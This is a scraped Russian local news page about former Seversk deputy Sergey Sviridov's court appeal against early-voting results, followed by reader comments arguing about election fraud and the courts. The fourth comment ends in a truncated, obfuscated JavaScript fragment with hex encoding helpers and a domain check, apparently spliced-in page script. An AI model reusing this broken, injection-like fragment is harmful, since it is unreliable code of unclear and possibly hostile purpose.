Последние комментарии:

вчера в 21:49 написал барыга
26.03.2024 00:12 написал ponni
19.03.2024 20:31 написал ponni
16.03.2024 21:51 написал alex33kaw
14.03.2024 19:11 написал ponni
05.03.2024 23:34 написал tourson
01.03.2024 18:51 написал ponni
01.03.2024 18:49 написал ponni
26.02.2024 20:57 написал rudolf
26.02.2024 17:47 написал ponni
21.02.2024 20:59 написал ponni
17.02.2024 09:30 написал ponni
14.02.2024 09:37 написал sprinter
14.02.2024 09:35 написал sprinter
13.02.2024 21:00 написал барыга


Бывший депутат Сергей Свиридов продолжает отстаивать свои права в суде


Бывший депутат Сергей Свиридов продолжает отстаивать свои права в суде

Суд апелляционной инстанции рассмотрит гражданское дело по административному исковому заявлению кандидата в депутаты Думы ЗАТО Северск третьего созыва по одномандатному избирательному округу №4 Сергея Свиридова к участковым избирательным комиссиям. Ранее Северский городской суд отказал кандидату в удовлетворении требований.

Напомним, что предметом дела является требования истца о признании незаконным решений участковых избирательных комиссий в части включения итогов досрочного голосования, отмене их решений и восстановлении избирательных прав кандидата.

В возражениях на апелляционную жалобу помощник прокурора ЗАТО г. Северск Николай Крылов полагает, что оснований для отмены решения Северского городского суда нет. Председатель Муниципальной избирательной комиссии ЗАТО Северск Людмила Орлова и представитель участковых избирательных комиссий Сергей Езопихин также считают, что административную жалобу Свиридова необходимо оставить без удовлетворения.





Категория: Новости » Северск » Политика

Комментарии: (15) 

19 декабря 2015   5

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: FANTOMAS
laughing


--------------------
Интернет – свободная площадка для общения. Но виртуальный мир – это продолжение мира реального, в которых люди живут в рамках определенных норм, в том числе – закона. К сожалению, некоторые пользователи глобальной сети об этом забывают. И – оказываются на скамье подсудимых.

Комментарий № 2:

Написал: Liberator
А как же г-н Андреев В.А., он что зря лизал?
Вы что хотите чтобы он чай без сахара пил?

Комментарий № 3:

Написал: Завсегдатый
Liberator,
smile lol  lol  lol 

Комментарий № 4:

Написал: Kapitalin-nike

КОДЕКС СУДЕЙСКОЙ ЭТИКИ ст8.п.3. Судья должен осуществлять профессиональную деятельность в строгом соответствии с законом, опираясь на внутреннее убеждение и не поддаваясь влиянию кого бы то ни было.

 

В настоящее время суды нужны только для того, чтобы обслуживать власть! Если б государство руководствовалось только конституцией и законами, то достаточно было создать компьютерную программу, и она выдавала бы вердикт, который исходил именно от законов, без всяких "внутренних убеждений"! А так «внутренние убеждения» выражаются в виде нескольких сотен тысяч зряплаты (30 современных серебряников). Иуды, короче говоря. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 5:

Написал: SergeyHasan
Ранее Северский городской суд отказал кандидату - а кто нибудь сомневался в этом?
вся власть с душком в этом городе.

Комментарий № 6:

Написал: klayan
Цитата: SergeyHasan
Ранее Северский городской суд отказал кандидату - а кто нибудь сомневался в этом?
 
 кто нибудь из комментаторов в курсе о чём речь? или просто попестеть охота?
дядя очень хочет во власть пролезть.. терять ему в принципе нечего - выборы он уже  просрал.. в качестве нарушения, трактуемого им в свою пользу, он пытается впарить байку о неправомерном досрочном голосовании.. типа досрочное  голосование допускается только при УВАЖИТЕЛЬНОЙ причине, а граждане голосовавшие досрочно, указали в заявлениях своих причиной досрочного голосования "отсутствие в городе в день голосования".. этот крендель не считает эту причину уважительной и настаивает на признании на этом основании результатов досрочного голосования недействительными.. плевать дяде на то, что люди не хотят расшифровывать эту размытую формулировку по вполне себе объективным причинам - не обязаны граждане расписывать этому дяде почему их в день выборов не будет.. куда они уедут, зачем, с кем, на какой срок, за какие деньги, уедут ли они вообще - это не дядино собачье дело..
 но дядя очень хочет во власть пролезть, ведь "счастье было так возможно" (с).. просрал то всего чуток.. 
и наконец риторический вопрос: нахрена такие депутаты во власти? ещё не избрамшись хернёй страдающие?

Комментарий № 7:

Написал: Liberator
Цитата: klayan
в качестве нарушения, трактуемого им в свою пользу, он пытается впарить байку о неправомерном досрочном голосовании.. типа досрочное голосование допускается только при УВАЖИТЕЛЬНОЙ причине,

Ты уверен, что знаешь все претензии?
По поводу дяди ты прав! В представителях народа он нах. не нужен, но очень подойдёт в качестве туалетной бумаги для стирания того говна, что прилипло к думским креслам.

Комментарий № 8:

Написал: intelligent
klayan,
Вы зря так эмоционируете. fellow Ведь общеизвестно, что досрочное голосование - один из самых эффективных способов "подкорректировать" результат народного волеизъявления.

Достаточно вспомнить, что в эту кампанию нечистые на руку депутаты и сам глава штаба одной из партий катались по бюджетным организациям и под угрозой увольнения давали директорам указивки, чтобы весь персонал был направлен на досрочное голосование. Так было в СОШ 89, детских садах 10 округа и всего города в целом.

Кто не понимает механизм избирательной манипуляции, скажу: при досрочном голосовании бюллетень запечатывают в конверт, на месте склейки ставят подписи два члена ТИК, а дальше всё - бюллетени в этих конвертах остаются вне какого-то контроля, хотя должны хранится в сейфах . Отвечает за них секретарь комиссии, который поставлен туда заинтересованными в определенном результате лицами, и что с этими конвертами проиисходит, до того как ангажированный серкретарь передаст их в УИК, никому не известно. Это и есть основная лазейка для махинаций. Не зря же президент Медведев, законник и приверженец демократических подходов, отменил в свое время "досрочку".

Ну а что касается кандидатов, не переходя на личности, никогда не поверю в то, что матерый депутат двух созывов, преседатель контрольно-правового комитета Думы I-го созыва, грамотный юрист и уважаемый в городе человек,  мог проиграть какому-то "младопарламентарию", никому не известному, да еще и с подмоченной репутацией. Поэтому Свиридов копает в правильном направлении. В конце концов, это на пользу всем нам, избирателям.

Комментарий № 9:

Написал: коля-ваня
intelligent,
Все верно, четко и понятно. 


--------------------
.

Комментарий № 10:

Написал: муся
Цитата: intelligent
то не понимает механизм избирательной манипуляции, скажу: при досрочном голосовании бюллетень запечатывают в конверт, на месте склейки ставят подписи два члена ТИК, а дальше всё - бюллетени в этих конвертах остаются вне какого-то контроля, хотя должны хранится в сейфах . Отвечает за них секретарь комиссии, который поставлен туда заинтересованными в определенном результате лицами, и что с этими конвертами проиисходит, до того как ангажированный серкретарь передаст их в УИК, никому не известно. Это и есть основная лазейка для махинаций. Не зря же президент Медведев, законник и приверженец демократических подходов, отменил в свое время "досрочку".

ну механизм досрочного голосования описан правимльный, все остальное из области "как здорово я все придумал!"

Комментарий № 11:

Написал: Lexx
А г-н Соколов, видимо, никак не может смириться с тем, что он третий раз третий... winked Стабильность - признак мастерства. В четвертый раз будет, видимо, четвертым wink

Комментарий № 12:

Написал: SergeyHasan
Цитата: klayan
и наконец риторический вопрос: нахрена такие депутаты во власти? ещё не избрамшись хернёй страдающие?
А тебя все депутаты устраивают?

Комментарий № 13:

Написал: Seversk-7
Хочется пожелать удачи депутату С. Свиридову. Сам голосовал за него, родственники и знакомые тоже. И всё же основной причиной такого результата считаю не мухлёж, а лень и безответственность непришедших на выборы жителей города.

Комментарий № 14:

Написал: Unit
Я думаю, что Свиридов не нужен нынешней администрации. С одной стороны это плохо, но, с другой стороны, репутация господина Свиридова тоже говорит, что его присутствие там тоже ничем хорошим не пахнет.

Комментарий № 15:

Написал: Kapitalin-nike
Unit,
А сама администрация хорошо пахнет?
stroimguru.ru
Курс валюты:
92.26 28↓   $     99.70 57↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: